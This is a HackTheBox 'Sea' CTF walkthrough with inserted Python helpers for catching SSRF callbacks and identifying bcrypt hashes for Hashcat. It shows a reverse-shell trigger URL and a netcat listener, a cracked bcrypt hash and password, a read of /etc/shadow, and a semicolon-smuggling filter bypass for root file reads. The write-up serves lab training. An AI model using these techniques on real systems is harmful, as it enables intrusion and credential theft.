Metadata
- Platform: HackTheBox
- CTF: Sea
- Difficulty: Easy
Summary
On this machine, we find an SSRF via the website field of the contact form and combine it with a public exploit for the CMS in use, which leverages an XSS vulnerability. Together, these give us a reverse shell. To reach the user account, we crack a bcrypt hash found in a JavaScript file.
Afterward, we find a locally running web application that analyzes log files for malicious patterns. Since this tool runs as root, we can trick its filter and read any file on the system.
Solution
Reconnaissance
A scan with Nmap returns two services:
However, no public CVEs apply to the versions of either service, so we enumerate the HTTP server instead.
When we visit the website, we see links to the domain sea.htb, which we add to our hosts file. The website itself does not offer any functionality apart from the contact page at http://sea.htb/contact.php.
Gobuster returns some more interesting directories for this domain, among them http://sea.htb/themes/bike/. Running Gobuster against this directory returns some files:
The version file contains 3.2.0, and LICENSE discloses that this theme was made by turboblack. After some googling, this theme appears to be made for WonderCMS, which is therefore likely running on this machine.
User Flag
The form on the contact page contains a website field. Let's see what happens with the input in that field.
We start an HTTP server on port 80 on our host and wait for incoming connections.
The website actually connects to the specified URL, which means we have an angle for a server-side request forgery (SSRF):
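The listener we ran for this check, written out as an added example (this is not code from the write-up). Beyond plain `python3 -m http.server`, it records the User-Agent of every callback, because that header tells you who actually fetched your URL: a library UA (curl, PHP, python-requests) points to a server-side fetch, i.e. classic SSRF, while a browser UA means someone or some bot opened the link in a browser, which is exactly the precondition an XSS chain needs. The listening port (80) and the `/ssrf-check` path used in the usage note are assumptions; use whatever URL you put into the website field.

```python
"""Callback listener for confirming a suspected SSRF (added example, not from the write-up)."""
import threading
import time
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Every inbound request is recorded here so it can be inspected after the fact.
CALLBACKS = []


def classify_fetcher(user_agent: str) -> str:
    """Guess what made the request from its User-Agent header.

    'browser' (including headless Chrome) means a client that would execute
    JavaScript, so an XSS payload at the URL would fire; 'library' means a
    server-side HTTP client, i.e. a true SSRF primitive.
    """
    ua = user_agent.lower()
    if not ua:
        return "unknown"
    if any(tok in ua for tok in ("mozilla", "chrome", "firefox", "safari", "headless")):
        return "browser"
    if any(tok in ua for tok in ("curl", "wget", "php", "python", "go-http", "java", "libwww")):
        return "library"
    return "unknown"


class CallbackHandler(BaseHTTPRequestHandler):
    """Record each GET and answer 200 so the fetcher does not retry or error out."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        CALLBACKS.append({
            "path": self.path,
            "peer": self.client_address[0],
            "user_agent": ua,
            "fetcher": classify_fetcher(ua),
        })
        body = b"ok\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        # One line per hit: who connected and what they asked for.
        print(f"[callback] {self.client_address[0]} {fmt % args}")


def start_listener(host="0.0.0.0", port=80):
    """Start the listener in a background thread and return the server object."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def wait_for_callback(timeout=60.0, poll=0.2):
    """Block until at least one request has arrived or the timeout expires."""
    deadline = time.monotonic() + timeout
    while not CALLBACKS and time.monotonic() < deadline:
        time.sleep(poll)
    return list(CALLBACKS)


def probe(url: str, user_agent: str) -> int:
    """Send one GET with a chosen User-Agent; used to exercise the listener locally."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status


if __name__ == "__main__":
    # Port 80 needs root; submit the contact form with http://<your-ip>/ssrf-check
    # as the website while this runs, then look at what came back.
    srv = start_listener()
    print("listening on :80, now submit the contact form with our URL as the website")
    for hit in wait_for_callback():
        print(hit)
    srv.shutdown()
```

If the recorded `fetcher` is `browser`, the target is opening links in a real browser, which is what makes the XSS-based exploit in the next step viable; a `library` result would instead suggest pointing the SSRF at internal services.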
In addition to this, there is a public exploit for the CMS and version used on this website: GitHub - prodigiousMind/CVE-2023-41425: WonderCMS Authenticated RCE - CVE-2023-41425. This exploit adds a custom theme via a reflected XSS, and that theme can contain a reverse shell. However, the exploit requires the target to visit a crafted link, which works for us thanks to the SSRF we found.
Since the exploit downloads a theme from GitHub, which conflicts with the machine having no internet access, we need to host the theme ourselves and adjust the exploit accordingly.
Let’s run this exploit:
Which generates this link for us to trigger with the SSRF:
We can see the incoming request for the XSS script as well as for the hosted theme.
After opening a listener with Netcat (nc -lvnp 1234), we invoke the shell by hitting the URL http://sea.htb/themes/exploit/rev.php?lhost=10.10.14.204&lport=1234, which the exploit specifies. We get a shell as www-data.
In the web server directory, we find the folder data, which contains database.js. In this file we find the password hash $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q.
After saving the hash to a file and running Hashcat, it detects the hash as bcrypt $2*$, Blowfish (Unix). To crack it, we call Hashcat with mode 3200:
It returns $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance, with which we gain access to the user amay and the user flag.
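As an added example (not part of the write-up), the hash identification above done by hand: the `$2y$10$` prefix is bcrypt's modular crypt format, where the two digits after the variant are the cost (2^cost Blowfish key-expansion rounds, so cost 10 means 1024 per guess, which is why a wordlist and not a mask attack is the right first move), followed by a 22-character salt and a 31-character digest. The same function also maps the other crypt(3)-style prefixes one meets in leaked config files to their Hashcat modes. Verifying a cracked candidate locally is done through the third-party `bcrypt` package, which is assumed to be installed only for that step.

```python
"""Identify crypt(3)-style hashes and map them to Hashcat modes (added example)."""
import re

# The hash recovered from data/database.js on this machine.
SEA_HASH = "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q"

# bcrypt MCF: $<variant>$<cost>$<22-char salt><31-char digest>, both in
# bcrypt's base64 alphabet (./A-Za-z0-9). Variants: $2$, $2a$, $2b$, $2x$, $2y$.
_BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# md5crypt / sha256crypt / sha512crypt: $id$[rounds=N$]salt$hash
_SHACRYPT_RE = re.compile(
    r"^\$(?P<id>[156])\$(?:rounds=(?P<rounds>\d+)\$)?"
    r"(?P<salt>[./A-Za-z0-9]{1,16})\$(?P<digest>[./A-Za-z0-9]+)$"
)
_SHACRYPT_INFO = {
    "1": ("md5crypt", 500, 1000),      # fixed 1000 rounds
    "5": ("sha256crypt", 7400, 5000),  # default 5000 rounds
    "6": ("sha512crypt", 1800, 5000),  # default 5000 rounds
}


def parse_bcrypt(hash_str: str) -> dict:
    """Split a bcrypt hash into variant, cost, salt and digest; reject malformed input."""
    m = _BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a well-formed bcrypt hash")
    cost = int(m["cost"])
    if not 4 <= cost <= 31:
        raise ValueError(f"bcrypt cost {cost} outside the valid range 4..31")
    return {
        "variant": m["variant"],
        "cost": cost,
        "iterations": 2 ** cost,  # key-expansion rounds per password guess
        "salt": m["salt"],
        "digest": m["digest"],
    }


def identify_crypt_hash(hash_str: str) -> dict:
    """Return algorithm, Hashcat mode, cost and salt for a crypt(3)-style hash."""
    if hash_str.startswith("$2"):
        info = parse_bcrypt(hash_str)
        return {"algorithm": "bcrypt", "hashcat_mode": 3200,
                "cost": info["cost"], "salt": info["salt"]}
    m = _SHACRYPT_RE.match(hash_str)
    if m:
        algorithm, mode, default_rounds = _SHACRYPT_INFO[m["id"]]
        rounds = int(m["rounds"]) if m["rounds"] else default_rounds
        return {"algorithm": algorithm, "hashcat_mode": mode,
                "cost": rounds, "salt": m["salt"]}
    raise ValueError("unrecognised hash format")


def verify_candidate(hash_str: str, password: str) -> bool:
    """Check a cracked candidate against the bcrypt hash before using it for SSH.

    Requires the third-party `bcrypt` package (assumption); PHP's $2y$ hashes
    verify fine as $2b$, which is what the library expects.
    """
    try:
        import bcrypt
    except ImportError as exc:  # keep the rest of the module usable without it
        raise RuntimeError("pip install bcrypt to verify candidates locally") from exc
    parse_bcrypt(hash_str)  # fail early on malformed input
    normalized = "$2b$" + hash_str[4:] if hash_str.startswith("$2y$") else hash_str
    return bcrypt.checkpw(password.encode(), normalized.encode())


if __name__ == "__main__":
    info = identify_crypt_hash(SEA_HASH)
    print(f"{info['algorithm']} cost={info['cost']} -> hashcat -m {info['hashcat_mode']}")
```

The `hashcat_mode` value is what goes after `-m`; for this hash that is 3200, matching what Hashcat's autodetection reported above.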
Root Flag
The account does not have any system privileges to abuse, such as SUID binaries or sudo rules. However, Netstat reveals a local service listening on port 8080:
Since we can't browse this website from the shell without a GUI, we tunnel the port to our host; amay has SSH access, which makes this possible.
This site prompts for a username and password, and amay's credentials suffice. The web page provides a service for monitoring the system and analyzing log files.
After intercepting the request made by the analyze button, we can change the specified log file. So why not try to read a file for which we don't have permissions, such as /etc/shadow? Surprisingly, we can read the file, meaning the service reads files as root and we have unrestricted file read, as long as the service's filter finds some pattern it would flag as suspicious in a log file. After some trial and error, entering the file as /root/root.txt; (with a trailing semicolon) tricks the filter and allows retrieval of the root flag.